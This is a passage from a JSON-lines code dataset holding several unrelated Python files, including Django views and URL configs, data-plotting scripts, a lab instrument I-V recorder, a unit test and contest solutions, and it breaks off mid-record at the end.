dj.strftime(\"%d\")\n compteur = Client.objects.filter(code__startswith=debut_code).count()\n if compteur < 10:\n s_compteur = '00' + str(compteur + 1)\n elif compteur < 100:\n s_compteur = '0' + str(compteur + 1)\n\n code = debut_code + s_compteur\n client.code = code\n client.save()\n b_sauver = True\n\n return {\"form\": formAjoutClient, \"b_sauver\": b_sauver}\n\n\ndef sauvClient(client):\n verrou = Verrou('codeClient.lock')\n while verrou.ferme() == 0:\n pass\n\n dj = date.today()\n debut_code = dj.strftime(\"%Y\") + dj.strftime(\"%m\") + dj.strftime(\"%d\")\n compteur = Client.objects.filter(code__startswith=debut_code).count()\n if compteur < 10:\n s_compteur = '00' + str(compteur + 1)\n elif compteur < 100:\n s_compteur = '0' + str(compteur + 1)\n\n code = debut_code + s_compteur\n client.code = code\n client.save()\n\n verrou.ouvre()\n\n return client\n\n\ndef ajoutPrescripteur(formAjoutPrescripteur):\n\n b_sauver = False\n\n if formAjoutPrescripteur.is_valid():\n formAjoutPrescripteur.save()\n b_sauver = True\n\n return {\"form\": formAjoutPrescripteur, \"b_sauver\": b_sauver}\n\n\ndef ajoutOrganisme(formAjoutOrganisme):\n\n b_sauver = False\n\n if formAjoutOrganisme.is_valid():\n formAjoutOrganisme.save()\n b_sauver = True\n\n return {\"form\": formAjoutOrganisme, \"b_sauver\": b_sauver}\n\n\ndef initFiltration(request):\n b_listeFiltree = False\n posted = None\n if \"appClient\" in request.session:\n if \"filtrage\" in request.session[\"appClient\"]:\n b_listeFiltree = True\n posted = request.session['appClient']['formRechercheClient']\n else:\n request.session[\"appClient\"] = {}\n else:\n request.session[\"appClient\"] = {}\n\n request.session.modified = True\n return {'posted': posted, 'b_listeFiltree': b_listeFiltree}\n\n\ndef filtration(request):\n #reset\n if \"filtrage\" in request.session['appClient']:\n formRechercheClient = FormRechercheClient()\n del request.session['appClient']['filtrage']\n del request.session['appClient']['formRechercheClient']\n b_listeFiltree = False\n\n filtrage = Client.objects.all()\n form = FormRechercheClient(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n\n if cd.get(\"code\"):\n filtrage = filtrage.filter(code__contains=cd.get(\"code\"))\n b_listeFiltree = True\n\n if cd.get(\"nom\"):\n filtrage = filtrage.filter(nom__contains=cd.get(\"nom\"))\n b_listeFiltree = True\n\n if cd.get(\"prenom\"):\n filtrage = filtrage.filter(prenom__contains=cd.get(\"prenom\"))\n b_listeFiltree = True\n\n if cd.get(\"telephone\"):\n filtrage = filtrage.filter(telephone__contains=cd.get(\"telephone\"))\n b_listeFiltree = True\n\n if cd.get(\"email\"):\n filtrage = filtrage.filter(email__contains=cd.get(\"email\"))\n b_listeFiltree = True\n\n if cd.get(\"organisme\"):\n filtrage = filtrage.filter(organisme=cd.get(\"organisme\"))\n b_listeFiltree = True\n\n if b_listeFiltree == True:\n formRechercheClient = FormRechercheClient(request.POST)\n request.session[\"appClient\"][\"filtrage\"] = filtrage\n request.session['appClient']['formRechercheClient'] = request.POST\n\n else:\n if \"filtrage\" in request.session['appClient']:\n del request.session['appClient']['filtrage']\n del request.session['appClient']['formRechercheClient']\n\n request.session.modified = True\n return {'filtrage': filtrage, 'b_listeFiltree': b_listeFiltree}\n","sub_path":"Antares/client/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"346838844","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport random\n\n# https://www.kaggle.com/paultimothymooney/chest-xray-pneumonia#chest_xray.zip\n\ntotal_images_train_normal = os.listdir('data/train/NORMAL/')\ntotal_images_train_pneumonia = os.listdir('data/train/PNEUMONIA/')\n\nsample_normal = random.sample(total_images_train_normal,6)\nf,ax = plt.subplots(2,3,figsize=(15,9))\n\n## ---------------- View example Healthy X-rays ----------------\nfor i in range(0,6):\n im = plt.imread('data/train/NORMAL/'+sample_normal[i])\n ax[i//3,i%3].imshow(im)\n ax[i//3,i%3].axis('off')\nf.suptitle('Normal Lungs')\nplt.show()\n\n\n## --------------- View example Pneumonia X-rays ---------------\nsample_pneumonia = random.sample(total_images_train_pneumonia,6)\nf,ax = plt.subplots(2,3,figsize=(15,9))\n\nfor i in range(0,6):\n im = plt.imread('data/train/PNEUMONIA/'+sample_pneumonia[i])\n ax[i//3,i%3].imshow(im)\n ax[i//3,i%3].axis('off')\nf.suptitle('Pneumonia Lungs')\nplt.show()\n\n\n## --------------- View dataset split ---------------\nplt.bar(x=['Normal','Pneumonia'],\n height=[len(total_images_train_normal),\n len(total_images_train_pneumonia)],\n color=['lightblue','lightred'])\nplt.title('Image volume in train set')\nplt.show()\n\n# data/ folder directory structure:\n# train/\n# NORMAL - 1341 images\n# PNEUMONIA - 3875 images\n# val/\n# NORMAL - 8 images\n# PNEUMONIA - 8 images\n# test/\n# NORMAL - 234 images\n# PNEUMONIA - 390 images\n\n\n","sub_path":"kaggle_pneumonia/dataset_overview.py","file_name":"dataset_overview.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"175763724","text":"# -*- coding:utf-8 -*-\n\nfrom torch import device\nfrom torch.cuda import is_available\n\n\nclass Option:\n \"\"\"\n All options for this program, including hyperparameters and other runtime settings.\n \"\"\"\n def __init__(self):\n # hyperparameters\n # initial learning rate\n self.lr = 0.005\n self.momentum = 0.9\n # learning rate decay\n self.lr_decay = 0.1\n self.lr_decay_threshold = 1e-5\n # weight decay\n self.reg = 1e-2\n\n # runtime settings\n # the root of dataset\n self.cifar10_path = '../data/'\n self.num_train = 45000\n self.num_total = 50000\n # statistics of cifar-10\n self.mean = (0.4914, 0.4822, 0.4465)\n self.std = (0.2023, 0.1994, 0.2010)\n\n # which model to use\n self.model = 'ResNet18'\n\n self.epochs = 20\n self.batch_size = 64\n\n self.print_freq = 200\n # number of processes used to load data\n self.workers = 4\n\n self.use_gpu = True\n self._upgrade_device()\n\n # visualization option\n self.visual = True\n\n def __setattr__(self, key, value):\n self.__dict__[key] = value\n if key == 'use_gpu':\n self._upgrade_device()\n\n def _upgrade_device(self):\n self.device = device('cuda:0' if self.use_gpu and is_available() else 'cpu')\n if self.device.type == 'cuda':\n self.pin_memory = True\n else:\n self.pin_memory = False\n\n\nopt = Option()\n","sub_path":"basic/option.py","file_name":"option.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"423803409","text":"#!/usr/bin/env python\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef label_line(line, label, x, y, color='0.5', size=12):\n \"\"\"Add a label to a line, at the proper angle.\n\n Arguments\n ---------\n line : matplotlib.lines.Line2D object,\n label : str\n x : float\n x-position to place center of text (in data coordinated\n y : float\n y-position to place center of text (in data coordinates)\n color : str\n size : float\n \"\"\"\n xdata, ydata = line.get_data()\n x1 = xdata[0]\n x2 = xdata[-1]\n y1 = ydata[0]\n y2 = ydata[-1]\n\n ax = line.axes\n text = ax.annotate(label, xy=(x, y), xytext=(-10, 0),\n textcoords='offset points',\n size=size, color=color,\n horizontalalignment='left',\n verticalalignment='bottom')\n\n sp1 = ax.transData.transform_point((x1, y1))\n sp2 = ax.transData.transform_point((x2, y2))\n\n rise = (sp2[1] - sp1[1])\n run = (sp2[0] - sp1[0])\n\n slope_degrees = np.degrees(np.arctan2(rise, run))\n text.set_rotation(slope_degrees)\n return text\n\ndef main():\n plt.xlabel('Arithmetic intensity (FLOP/byte)',fontsize=20)\n plt.ylabel('Performance (GFLOPS)',fontsize=20)\n plt.xticks(fontsize=14)\n plt.yticks(fontsize=14)\n plt.loglog()\n\n xmin = 1.0e-2\n xmax = 1000\n ymin = 1.0e-2\n ymax = 1.0e3\n\n # ridge\n # 2nd x point is where label is placed\n x_bw = [xmin, 1.0e-3, 10]\n\n # Flat mode\n \n # DRAM\n BW = 15.2\n y_bw = [BW * x_bw[0], BW * x_bw[1], BW * x_bw[2]]\n plt.plot(x_bw, y_bw, color='r', linestyle='-', label='_DRAM: 15.7 GB/s')\n\n # L3\n BW = 27.8\n y_bw = [BW * x_bw[0], BW * x_bw[1], BW * x_bw[2]]\n plt.plot(x_bw, y_bw, color='y', linestyle='-', label='_L3: 26.5 GB/s')\n\n # L2\n BW = 228.7\n y_bw = [BW * x_bw[0], BW * x_bw[1], BW * x_bw[2]]\n plt.plot(x_bw, y_bw, color='g', linestyle='-', label='_L2: 226.1 GB/s')\n\n # L1\n BW = 362.0\n y_bw = [BW * x_bw[0], BW * x_bw[1], BW * x_bw[2]]\n plt.plot(x_bw, y_bw, color='b', linestyle='-', label='_L1: 362.2 GB/s')\n\n # roof\n x_compute = [1.0e-2,15,xmax]\n\n # Scalar add peak\n y_compute = [7.4, 7.4, 7.4]\n plt.plot(x_compute, y_compute, color='r', linestyle='-',\n label='_Scalar add: 7.4 GF/s')\n\n # DP Vector add peak\n y_compute = [52.6, 52.6, 52.6]\n plt.plot(x_compute, y_compute, color='y', linestyle='-',\n label='_DP vector add: 52.6 GF/s')\n\n # DP Vector FMA peak\n y_compute = [105.2, 105.2, 105.2]\n plt.plot(x_compute, y_compute, color='g', linestyle='-',\n label='_DP vector FMA: 105.2 GF/s')#, SP vector add')\n\n# # SP Vector add peak\n# y_compute = [105.2, 105.2, 105.2]\n# plt.plot(x_compute, y_compute, color='c', linestyle='-',\n# label='SP vector add')\n\n # SP Vector FMA peak\n y_compute = [210.3, 210.3, 210.3]\n plt.plot(x_compute, y_compute, color='b', linestyle='-',\n label='_SP vector FMA: 210.3 GF/s')\n\n # plot the labels\n lines = plt.gca().get_lines()\n for line in lines:\n label_line(line, line.get_label(),\n line.get_xdata()[1], line.get_ydata()[1])\n\n # SpMV\n AI = 0.10\n GFS = 1.55\n plt.plot(AI,GFS,'o',ms=10,color='r',label='SpMV')\n plt.plot([AI,AI], [ymin,ymax], color='k', linestyle='--', lw=0.2)\n plt.plot([xmin,xmax], [GFS,GFS], color='k', linestyle='--', lw=0.2)\n\n # SYMGS Forward\n AI = 0.1\n GFS = 2.1\n plt.plot(AI,GFS,'o',ms=10,color='g',label='GS Forward')\n plt.plot([AI,AI], [ymin,ymax], color='k', linestyle='--', lw=0.2)\n plt.plot([xmin,xmax], [GFS,GFS], color='k', linestyle='--', lw=0.2)\n\n # SYMGS Backward\n AI = 0.1\n GFS = 1.752\n plt.plot(AI,GFS,'o',ms=10,color='b',label='GS Backward')\n plt.plot([AI,AI], [ymin,ymax], color='k', linestyle='--', lw=0.2)\n plt.plot([xmin,xmax], [GFS,GFS], color='k', linestyle='--', lw=0.2)\n\n plt.legend(loc='lower right')\n plt.show()\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"roof.py","file_name":"roof.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"370363852","text":"# Copyright 2014-2020 Scalyr Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ------------------------------------------------------------------------\n#\n# author: Edward Chee \n\nfrom __future__ import unicode_literals\nfrom __future__ import absolute_import\n\n\nfrom scalyr_agent.builtin_monitors.url_monitor import UrlMonitor\nfrom scalyr_agent.test_base import ScalyrTestCase\n\nimport mock\n\n\nclass UrLMonitorTest(ScalyrTestCase):\n def test_gather_sample(self):\n monitor_config = {\n \"module\": \"shell_monitor\",\n \"url\": \"https://www.scalyr.com\",\n \"request_method\": \"GET\",\n \"max_characters\": 100,\n }\n mock_logger = mock.Mock()\n monitor = UrlMonitor(monitor_config, mock_logger)\n\n monitor.gather_sample()\n call_args_list = mock_logger.emit_value.call_args_list[0]\n call_args = call_args_list[0]\n call_kwargs = call_args_list[1]\n\n self.assertEqual(call_args[0], \"response\")\n self.assertTrue(len(call_args[1]) >= 10)\n self.assertEqual(call_kwargs[\"extra_fields\"][\"url\"], \"https://www.scalyr.com\")\n self.assertEqual(call_kwargs[\"extra_fields\"][\"status\"], 200)\n self.assertEqual(call_kwargs[\"extra_fields\"][\"request_method\"], \"GET\")\n","sub_path":"scalyr_agent/builtin_monitors/tests/url_monitor_test.py","file_name":"url_monitor_test.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"335447060","text":"\nfrom starter2 import *\n\nimport data_locations as dl\nreload(dl)\nimport davetools as DT\nfrom scipy.interpolate import *\nreload(DT)\nplt.close('all')\n#file_list=glob.glob('/home/dcollins/scratch/Paper19/particle_error/particle_error_test_c0031_threeframes.h5')\n#file_list=glob.glob('/home/dcollins/scratch/Paper19/particle_error/track_indfix_sixteenframe_core_0031.h5')\n#file_list=glob.glob('/home/dcollins/scratch/Paper19/particle_error/track_indfix_sixteenframe_core_0031.h5')\n#file_list=glob.glob('/scratch1/dcollins/Paper19/track_index_fix/track_indfix_sixteenframe_core_*.h5')\n#file_list=glob.glob('/home/dcollins/scratch/Paper19/track_index_fix/track_indfix_sixteenframe_core_*.h5')\n\nfile_list=glob.glob('%s/track_indfix_sixteenframe_core_*.h5'%dl.snapshot_location)\n#file_list=file_list[0:4]\nplt.close('all')\nG = 1620./(4*np.pi)\nslope_array = []\ninter_array = []\nr_final_array = []\ny_den_array= []\np_10_array = []\np_11_array = []\n#norm = ds.arr(1,'cm')\n\nif 'ext_v' not in dir():\n ext_d=dl.extents()\n ext_r=dl.extents()\n print(\"Running Extents\")\n for nfile,fname in enumerate(file_list):\n this_looper=looper.core_looper(directory=dl.enzo_directory)\n trw.load_loop(this_looper,fname)\n thtr = this_looper.tr\n if True:\n for frame in this_looper.snaps:\n for core_id in this_looper.snaps[frame]:\n density = thtr.c([core_id],'density')\n snap = this_looper.snaps[frame][core_id]\n if snap.R_mag.any() >1:\n ext_r(snap.R_mag)\n ext_d(snap.field_values['density'])\nfor nfile,fname in enumerate(file_list):\n #0164.h5\n print('nfile is = %d'%nfile)\n t1 = fname.split(\"/\")[-1]\n #l = len(\"track_three_to_test_core_\")\n #l = len(\"track_sixteen_frames_core_\")\n l = len(\"track_indfix_sixteenframe_core_\")\n\n this_cor = int(t1[l:l+4]) #[fname.index('_'):]\n #this_cor=31\n #if this_cor not in [12]:#, 31]:\n # continue\n print(this_cor)\n this_looper=looper.core_looper(directory=dl.enzo_directory)\n trw.load_loop(this_looper,fname)\n thtr = this_looper.tr\n all_cores = np.unique(thtr.core_ids)\n core_list=all_cores\n rm = rainbow_map(len(all_cores))\n if 1:\n #big histogram\n asort = np.argsort(thtr.times)\n n0=asort[0]\n tsorted = thtr.times[asort]\n density_h = density.transpose()\n density_r = np.zeros([16,181])\n all_density =[]\n all_radius = []\n #for i in range(len(density_h)):\n # density_r[i] = density_h[15-i]\n\n #print('the length of density 2 is %d'%len(density_2))\n #print(density)\n y = np.zeros([len(snap.R_mag)])\n y_c = np.zeros([len(snap.R_mag)])\n #all_density = np.zeros([len(tsorted),len(snap.field_values['density'])])\n #all_rad = np.zeros([len(snap.R_mag)])\n #print('length is %d'%len(snap.field_values['density']))\n #print('the length of radius array is %d'\n\n fig=plt.figure(figsize=(4,4))\n axa=fig.subplots(1,1)\n frame_list=sorted(list(this_looper.snaps.keys()))\n tmap=rainbow_map(len(this_looper.snaps.keys()))\n tmap_2=rainbow_map(len(tsorted))\n #for iframe in range(len(frame_list)):\n #print(iframe)\n\n for iframe,frame in enumerate(frame_list):\n t_good = tsorted[iframe]\n #print('the length of R_mag is: %d ' % len(snap.R_mag))\n #print(snap.R_mag)\n #print('the value of the index is = %d'%iframe)\n #print('the value of the frame is = %d'%frame)\n #print('the value of the time is = %f'%tsorted[iframe])\n #print('the length of the density is %d'%len(snap.field_values['density']))\n #print(density_r[iframe]-snap.field_values['density'])\n #for i in range(len(snap.field_values['density'])):\n #all_density[iframe][i] = snap.field_values['density'][i]\n \n \n \n\n\n for core_id in this_looper.snaps[frame]:\n snap = this_looper.snaps[frame][core_id]\n if len(snap.R_mag) < 3:\n continue\n ave_density = snap.field_values['density'].mean(axis=0)\n ave_R = snap.R_mag.mean(axis=0)\n all_rad=snap.R_mag\n #print(snap.R_mag)\n #y = 2*(snap.R_mag)**(-2)*t_good**2\n #y_c = (snap.R_mag)**(-1.5)\n #y = (np.pi*4*G)**(-1)*(2/(snap.R_mag)**2)\n #y_c = (np.pi*4*G)**(-1)*(0.975/2)**(0.5)*(t_good**(-0.5)*snap.R_mag**(-1.5))\n #for i in range(len(snap.field_values['density'])):\n #all_density[iframe][i] = snap.field_values['density'][i]\n\n the_R = snap.R_mag\n the_R[the_R<1./2048]=1./2048\n all_radius.append(the_R)\n all_density.append(snap.field_values['density'])\n #print('the length of the_R is %d'%len(snap.field_values['density']))\n ave_the_R = the_R.mean(axis=0)\n #p1 = np.polyfit(ave_the_R, ave_density,2)\n #print(p1)\n\n axa.scatter(the_R,snap.field_values['density'],c=tmap(iframe,snap.R_mag.size),s=0.1,label=str(frame))\n #axa.plot(the_R,np.poly1d(p1,ave_the_R),'r-')\n y = (np.pi*4*G)**(-1)*(20/(snap.R_mag)**2)\n #axa.plot( snap.R_mag, y, c= tmap_2(iframe))\n #axa.plot(ave_R,ave_density, c = 'k',marker='*')\n all_density = np.array(all_density)\n all_radius = np.array(all_radius)\n all_density= all_density.flatten()\n all_radius = all_radius.flatten()\n density_log = np.log10(all_density)\n radius_log = np.log10(all_radius)\n if len(all_radius) > 0:\n p1 = np.polyfit(radius_log,density_log,1)\n p_10_array.append(p1[0])\n p_11_array.append(p1[1])\n slope_array.append(p1[0])\n inter_array.append(10**p1[1])\n r_final_array.append(min(all_radius))\n print(p1)\n y_den = 10**p1[1]*all_radius**p1[0] \n if len(y_den)>0:\n y_den_array.append(max(y_den))\n axa.scatter(all_radius,y_den,s=2,c = 'k',marker='*')\n #DT.axbonk(axa,xscale=('symlog',linthreshy=1/2048),yscale='log',xlabel='R_mag',ylabel='density')\n axa.set_xscale('symlog',linthreshx=1./2048)\n axa.set_yscale('log')\n axa.set_xlim(1./2048,1./10)\n axa.set_ylim(1,10**6)\n axa.set_title('the slope is %f and the y intercep is %f' %(p1[0],10**p1[1]))\n #axa.set_yscale('symlog',linthreshy=vel_linthresh)\n #axa.set_xscale('symlog',linthreshx=2*rmin)\n outname = 'image_tracks/density_part_poly_c%04d.png'%core_id\n print(outname)\n #axa.legend(loc=0)\n fig.savefig(outname)\n if len(slope_array)==160:\n plt.clf()\n#----------------------- making histogram -------------------------------------------------#\n plt.hist(slope_array,bins = 2)\n outname2 = 'image_tracks/density_histo_slope_more.png'\n print(outname2)\n plt.savefig(outname2)\n#------------------------- making intercept vs slope graph ---------------------------------#\n plt.clf()\n plt.scatter(slope_array,inter_array, c = 'r', marker = '*')\n plt.xscale('linear')\n plt.yscale('linear')\n plt.xlabel('slope')\n plt.ylabel('y_intercept')\n plt.ylim([min(inter_array),max(inter_array)+1])\n outname3 = 'image_tracks/slope_vs_inter_linear.png'\n plt.savefig(outname3)\n plt.clf()\n plt.scatter(slope_array,y_den_array,c='k',marker='*')\n plt.xscale('linear')\n plt.yscale('log')\n plt.xlabel('slope')\n plt.ylabel('true y_intercept')\n plt.ylim([min(y_den_array),max(y_den_array)])\n outname4 = 'image_tracks/slope_vs_y_inter.png'\n plt.savefig(outname4)\n plt.clf()\n #p_new = np.polyfit(y_den_array,y_den_max,1)\n #print(\"p_new is:\")\n #print(p_new)\n plt.scatter(slope_array,r_final_array,c='k',marker='*')\n #plt.scatter(y_den_array,y_den_array+p_new[1],c='r',marker='*')\n plt.xlabel('slope')\n plt.ylabel('final radius')\n #plt.title('the slope is %f'%(p_new[0]))\n plt.xscale('linear')\n plt.yscale('log')\n plt.ylim=([min(r_final_array),max(r_final_array)])\n outname5 = 'image_tracks/radius_vs_slope.png'\n plt.savefig(outname5)\n","sub_path":"other_scripts/density_particle_poly.py","file_name":"density_particle_poly.py","file_ext":"py","file_size_in_byte":8690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"11051103","text":"import webbrowser\n\n\n# Written during course of lecture videos\nclass Movie():\n \"\"\"\n Movie class that holds title, storyline, poster image, and a url to \n the trailer.\n \"\"\"\n def __init__(self, movie_title, movie_storyline, poster_image,\n trailer_youtube):\n self.title = movie_title\n self.storyline = movie_storyline\n self.poster_image_url = poster_image\n self.trailer_youtube_url = trailer_youtube\n\n def show_trailer(self):\n webbrowser.open(self.trailer_youtube_url)\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"574174190","text":"'''\nI-V recorder\nPP 07-11-2018\nusage iv_recorder \n'''\n# Added a command to read the real voltage (line 78-80) : 16-07-2018 by Osama Mohsen\n# Added a new path to sort measurments by date in the Documents \nfrom __future__ import print_function #Python 2.7 compatibility\nimport gpib\nimport time\nimport numpy as np\nimport os\n###############################################\n\n\nNsamp=100 # number of point to record\nNstep=40 # number of point to record\nVmin=2000\nVmax=8000\ndir_path = '/usr/local/home/labuser/Documents/'\nrootname = 'iv_monitoring'\n\n\n###############################################\n\n\nusb_port=gpib.Control()\n\ntimestamp = time.strftime(\"D%Y%m%dT%H%M%S\")\n\nnewdir = time.strftime(\"%y-%B-%d\")\n\npath = dir_path+str('/')+str(newdir)\n\nif not os.path.isdir(path):\n os.makedirs(path)\n\ndir_path = path\n\nfilename = dir_path+str('/')+rootname+'_'+timestamp\n\nNpts=Nsamp*Nstep\nchart_time = np.zeros((Npts))\ncurrent = np.zeros((Npts))\nvoltage = np.zeros((Npts))\nvoltage_set= np.linspace(Vmin, Vmax, Nstep+1)\n\n\nusb_port=gpib.Control()\n\nint_range = 2e-7\nusb_port.x.write(\"*RST\") \ntime.sleep(0.50)\nusb_port.x.write(\"SYST:ZCH OFF\")\ntime.sleep(0.50)\nrange_comm = str('\\'SENS:CURR:RANG')+str(' ')+str(int_range)+str('\\'')\nusb_port.x.write(range_comm)\ntime.sleep(0.50)\nusb_port.x.write(\"SYST:AZER:STAT OFF\") \ntime.sleep(0.50)\n\n\ncommand = str('VSET') + str(Vmin)\nusb_port.x.write('++addr 13')\nusb_port.x.write(command)\nusb_port.x.write('HVON')\nm = usb_port.x.query_ascii_values('VOUT?')\nprint(m)\n\nfor i in range(Nsamp):\n tmp=usb_port.x.query_ascii_values('read?',separator='A',container=np.array)\n print(tmp[0])\n\n\n","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"243961139","text":"\"\"\"healthnet URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.conf.urls import url\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\n\nfrom healthnet import views\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^dashboard/', views.dashboard, name=\"dashboard\"),\n url(r'^log/(?P\\d{2}-\\d{2}-\\d{4})/(?P\\d{2}-\\d{2}-\\d{4})', views.log, name=\"log\"),\n url(r'^log/', views.log, name=\"log\"),\n url(r'^result/(?P\\d+)/', views.result, name=\"result\"),\n url(r'^prescription/(?P\\d+)/', views.prescription, name=\"prescription\"),\n url(r'^$', views.index, name=\"index\"),\n url(r'^cancel_appointment/(?P\\d+)/$', views.cancel_appointment, name=\"cancel_appointment\"),\n url(r'^remove_prescription/(?P\\d+)/$', views.remove_prescription, name=\"remove_prescription\"),\n url(r'^register/', views.registration1, name=\"registration\"),\n url(r'^register2/', views.registration2, name=\"registration2\"),\n url(r'^logout/', views.logout, name=\"logout\"),\n url(r'^create_appointment_1/', views.create_appointment_1, name=\"create_appointment_1\"),\n url(r'^create_appointment_2/', views.create_appointment_2, name=\"create_appointment_2\"),\n url(r'^create_appointment_3/', views.create_appointment_3, name=\"create_appointment_3\"),\n url(r'^edit_info/(?P\\d+)/$', views.edit_info, name=\"edit_info\"),\n url(r'^edit_info/', views.edit_info, name=\"edit_info\"),\n url(r'^edit_appointment/(?P\\d+)/', views.edit_appointment, name=\"edit_appointment\"),\n url(r'^release_test_result/(?P\\d+)/', views.release_test_result, name=\"release_test_result\"),\n url(r'^create_test_result/(?P\\d+)/(?P[\\w|\\W]+)/$', views.create_test_result,\n name=\"create_test_result\"),\n url(r'^create_test_result/(?P\\d+)/', views.create_test_result, name=\"create_test_result\"),\n url(r'^create_prescription/(?P\\d+)/(?P[\\w|\\W]+)/$', views.create_prescription,\n name=\"create_prescription\"),\n url(r'^create_prescription/(?P\\d+)/', views.create_prescription, name=\"create_prescription\"),\n url(r'^toggle_admit/(?P\\d+)/$', views.toggle_admit, name=\"toggle_admit\"),\n url(r'^transfer/(?P\\d+)/$', views.transfer, name=\"transfer\"),\n url(r'^toggle_read/(?P\\d+)/$', views.toggle_read, name=\"toggle_read\"),\n url(r'^approve_user/(?P\\d+)/$', views.approve_user, name=\"approve_user\"),\n url(r'^send_message/(?P\\d+)/$', views.send_message, name=\"send_message\"),\n url(r'^send_message/', views.send_message, name=\"send_message\"),\n url(r'^reply_message/(?P\\d+)/$', views.reply_message, name=\"reply_message\"),\n url(r'^sent_messages/', views.sent_messages, name=\"sent_messages\"),\n url(r'^inbox/', views.inbox, name=\"inbox\"),\n url(r'^doctor_registration/', views.doctor_registration, name=\"doctor_registration\"),\n url(r'^edit_doctor_info/(?P\\d+)/$', views.edit_doctor_info, name=\"edit_doctor_info\"),\n url(r'^edit_doctor_info/', views.edit_doctor_info, name=\"edit_doctor_info\"),\n url(r'^nurse_registration/', views.nurse_registration, name=\"nurse_registration\"),\n url(r'^edit_nurse_info/(?P\\d+)/$', views.edit_nurse_info, name=\"edit_nurse_info\"),\n url(r'^edit_nurse_info/', views.edit_nurse_info, name=\"edit_nurse_info\"),\n url(r'^admin_registration/', views.admin_registration, name=\"admin_registration\"),\n url(r'^view_profile/(?P\\d+)/$', views.view_profile, name=\"view_profile\"),\n url(r'^statistics/(?P\\d+)/(?P\\d{2}-\\d{2}-\\d{4})/(?P\\d{2}-\\d{2}-\\d{4})$',\n views.statistics, name=\"statistics\"),\n url(r'^statistics/(?P\\d+)/$', views.statistics, name=\"statistics\"),\n url(r'^export/$', views.export, name=\"export\"),\n url(r'^register_choose/$', views.register_choose, name=\"register_choose\"),\n\n # DEBUG\n # url(r'^debug/create_test_user', views.create_test_user, name=\"create_test_user\"),\n # url(r'^debug/create_admin_user', views.create_admin_user, name=\"create_admin_user\"),\n # url(r'^debug/create_test_doctor', views.create_test_doctor, name=\"create_test_doctor\"),\n # url(r'^debug/create_test_nurse', views.create_test_nurse, name=\"create_test_nurse\"),\n ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"healthnet/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":5593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"124067525","text":"from django.conf.urls import url\n\nurlpatterns = [\n\n url(r'^$', 'htm.views.mainIndex'),\n # url(r'^tag/$', 'htm.views.htmTag'),\n\n #2018-06-20\n url(r'^tag/add/$', 'htm.views.htmAdd', name='add'),\n #아래의 패턴에 들어가지 않게 위에다가 작성해줌\n url(r'^tag/([a-z]+)/$', 'htm.views.htmAdd'),\n \n \n\n\n \n #2018-06-18\n url(r'^tag/$', 'htm.views.htmSearch'),\n #실습\n url(r'^calc/$', 'htm.views.htmCalc'),\n url(r'^calc/result/$', 'htm.views.htmResult'),\n #왜 오류나나 했는데 name값 너으니까 오류나네 왜지. name값 넣을거면 다 넣어야하나... \n\n]","sub_path":"proj7/myweb/htm/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"397885420","text":"# Letters Rearranging\nimport sys\ndef is_palindromes(string):\n # 회문검사\n good = True\n for k in range(len(string) // 2):\n if string[k] != string[-(k + 1)]:\n good = False\n break\n return good\n\ndef rearrange(i, j, string):\n string[i], string[j] = string[j], string[i]\n return string\n\n\nfor _ in range(int(sys.stdin.readline())):\n string = list(sys.stdin.readline().rstrip())\n is_good = False\n for i in range(len(string) - 1):\n re_string = rearrange(i, i + 1, string)\n if not is_palindromes(re_string):\n is_good = True\n print(''.join(re_string))\n break\n if not is_good:\n print(-1)\n","sub_path":"SsangWoo/python/codeforce/contest/1093-B.py","file_name":"1093-B.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"371084651","text":"def exam16():\n x=input().split(\" \")\n n,p=int(x[0]),int(x[1])\n counter=[]\n string=[i for i in input().split(\" \")]\n alph=['A', 'B', 